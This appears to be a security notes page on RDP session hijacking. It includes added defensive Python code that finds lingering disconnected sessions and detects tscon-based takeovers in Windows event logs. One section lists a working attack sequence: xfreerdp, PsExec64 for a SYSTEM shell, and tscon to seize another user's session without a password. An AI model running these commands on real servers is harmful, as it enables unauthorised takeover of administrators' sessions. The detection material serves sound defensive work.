RDP Hijacking
Required Privileges: Administrators
Works only on Windows Server 2016 and Earlier.
When an Administrator uses Remote Desktop to connect to a machine and closes the RDP Client instead of logging off, the Session remains open on the server indefinitely. If we have SYSTEM Privileges on Windows Server 2016 and Earlier, we can take over any existing RDP Session without needing that user's password.
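Disconnected sessions are the precondition for this technique, so the first thing an administrator wants is a way to find them. The following is an added example, not part of the original page: a small parser for the output of the Windows `query user` command that reports sessions in the Disc state idle for longer than a threshold. The sample output is constructed for the example (not captured from a real host), and the column layout and idle-time formats (".", "M", "H:MM", "D+HH:MM") are assumed from how `query user` normally prints them.

```python
import re
from typing import Dict, List

# Constructed sample of `query user` output (not from a real host).
# The leading ">" marks the session the command was run from; a disconnected
# ("Disc") session has an empty SESSIONNAME column, which is why rows are
# parsed with a regex rather than by splitting on whitespace.
SAMPLE_QUERY_USER = """\
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>administrator         rdp-tcp#1           2  Active          .  1/5/2024 10:02 AM
 alice                                     3  Disc         2:15  1/5/2024 8:30 AM
 bob                                       4  Disc      1+03:00  1/4/2024 9:12 AM
 carol                                     5  Disc            5  1/5/2024 10:40 AM
"""

_ROW = re.compile(
    r"^\s*(?P<current>>?)(?P<user>\S+)"       # optional ">" then USERNAME
    r"(?:\s+(?P<session>[^\s\d]\S*))?"         # SESSIONNAME, absent when disconnected
    r"\s+(?P<id>\d+)"                          # numeric session ID (used by tscon)
    r"\s+(?P<state>\S+)"                       # Active / Disc / ...
    r"\s+(?P<idle>\S+)"                        # IDLE TIME: ".", "5", "2:15", "1+03:00"
    r"\s+(?P<logon>.+?)\s*$"                   # LOGON TIME (rest of the line)
)


def idle_minutes(idle: str) -> int:
    """Convert a query user IDLE TIME field to whole minutes.

    Assumed formats: "." or "none" (no idle time), "M", "H:MM", "D+HH:MM".
    """
    if idle in (".", "none"):
        return 0
    days = 0
    if "+" in idle:
        day_part, idle = idle.split("+", 1)
        days = int(day_part)
    if ":" in idle:
        hours, mins = idle.split(":", 1)
        return days * 1440 + int(hours) * 60 + int(mins)
    return days * 1440 + int(idle)


def parse_query_user(output: str) -> List[Dict[str, object]]:
    """Parse query user output into one dict per session row."""
    sessions: List[Dict[str, object]] = []
    for line in output.splitlines():
        if not line.strip() or line.lstrip().startswith("USERNAME"):
            continue
        m = _ROW.match(line)
        if not m:
            continue  # not a session row; ignore
        sessions.append({
            "user": m.group("user"),
            "session": m.group("session") or "",
            "id": int(m.group("id")),
            "state": m.group("state"),
            "idle_minutes": idle_minutes(m.group("idle")),
            "logon": m.group("logon"),
            "current": m.group("current") == ">",
        })
    return sessions


def lingering_disconnected(output: str, max_idle_minutes: int = 60) -> List[Dict[str, object]]:
    """Return disconnected sessions idle longer than max_idle_minutes.

    These are exactly the sessions that stay reattachable until someone logs
    them off, so they are what an administrator should log off or cap with a
    disconnected-session time limit.
    """
    return [s for s in parse_query_user(output)
            if str(s["state"]).lower() == "disc" and int(s["idle_minutes"]) > max_idle_minutes]


if __name__ == "__main__":
    for s in lingering_disconnected(SAMPLE_QUERY_USER):
        print(f"session {s['id']} ({s['user']}) disconnected, idle {s['idle_minutes']} min")
```

On a real server you would feed the script the actual output (`query user > sessions.txt`) and act on the rows it returns, either logging them off or setting the Group Policy time limit for disconnected sessions so they cannot linger indefinitely.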
Hijacking the Session
Windows Server 2019 won't allow you to Connect to another User's Session without knowing that user's Password. If we have Administrator-Level Access, we can get SYSTEM by any method of our preference.
:: Connect via RDP
xfreerdp /v:TARGET /u:USERNAME /p:PASSWORD
:: Upload and run PsExec64 to spawn a SYSTEM shell (-s) in Interactive Mode (-i)
PsExec64.exe -accepteula -i -s cmd.exe
:: List Available Sessions
query user
query session
:: Connect to a Session: attach the target session ID (from query user) to our own session name (from query session)
tscon ID /dest:OUR_SESSIONNAME
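From the defender's side, the sequence above leaves two traces in the Security log: a process creation event (4688) for tscon.exe running as SYSTEM, followed within seconds by a session reconnection event (4778) for the hijacked user. The following is an added example, not part of the original page: detection logic that runs over constructed event records (modelled on the EventData field names of 4688 and 4778, not real captured logs) and raises an alert for any tscon.exe execution, escalating it when the process ran as SYSTEM and a 4778 reconnect follows inside a short correlation window. The window length and the record layout are assumptions of the example.

```python
from datetime import datetime
from typing import Dict, List

# Constructed sample events (not real logs). 4688 = process creation with
# command-line auditing enabled, 4778 = session reconnected to a window station.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 4688, "TimeCreated": "2024-01-05T10:05:00", "SubjectUserName": "administrator",
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe"},
    {"EventID": 4688, "TimeCreated": "2024-01-05T10:06:30", "SubjectUserName": "SYSTEM",
     "NewProcessName": "C:\\Windows\\System32\\tscon.exe", "CommandLine": "tscon 3 /dest:rdp-tcp#1"},
    {"EventID": 4778, "TimeCreated": "2024-01-05T10:06:31", "AccountName": "alice",
     "SessionName": "rdp-tcp#1", "ClientName": "WS-ADMIN"},
    # A normal reconnect by the session owner, with no tscon before it.
    {"EventID": 4778, "TimeCreated": "2024-01-05T12:00:00", "AccountName": "bob",
     "SessionName": "rdp-tcp#4", "ClientName": "BOB-LAPTOP"},
]


def _ts(ev: Dict[str, object]) -> datetime:
    return datetime.fromisoformat(str(ev["TimeCreated"]))


def detect_session_hijack(events: List[Dict[str, object]], window_seconds: int = 60) -> List[Dict[str, object]]:
    """Flag tscon.exe executions and 4778 reconnects that closely follow them.

    Severity: "medium" for any tscon.exe run, "high" when run as SYSTEM (the
    privilege that makes a password-less takeover possible), and "critical"
    for a 4778 reconnect within window_seconds of a tscon.exe run.
    """
    alerts: List[Dict[str, object]] = []
    tscon_runs: List[Dict[str, object]] = []
    for ev in sorted(events, key=_ts):
        if ev["EventID"] == 4688 and str(ev["NewProcessName"]).lower().endswith("\\tscon.exe"):
            tscon_runs.append(ev)
            as_system = str(ev["SubjectUserName"]).upper() == "SYSTEM"
            alerts.append({
                "severity": "high" if as_system else "medium",
                "reason": "tscon.exe executed",
                "time": ev["TimeCreated"],
                "user": ev["SubjectUserName"],
                "cmdline": ev["CommandLine"],
            })
        elif ev["EventID"] == 4778:
            for run in tscon_runs:
                delta = (_ts(ev) - _ts(run)).total_seconds()
                if 0 <= delta <= window_seconds:
                    alerts.append({
                        "severity": "critical",
                        "reason": "session reconnected shortly after tscon.exe",
                        "time": ev["TimeCreated"],
                        "account": ev["AccountName"],
                        "session": ev["SessionName"],
                        "cmdline": run["CommandLine"],
                    })
                    break
    return alerts


if __name__ == "__main__":
    for a in detect_session_hijack(SAMPLE_EVENTS):
        print(a["severity"], a["time"], a["reason"], a.get("cmdline"))
```

The 4688 CommandLine field is only populated when the "Include command line in process creation events" audit policy is enabled; without it the process name still identifies tscon.exe, but the /dest: target is lost. The TerminalServices-LocalSessionManager operational log records the same reconnection (event 25) and can be used as a second correlation source with the same logic.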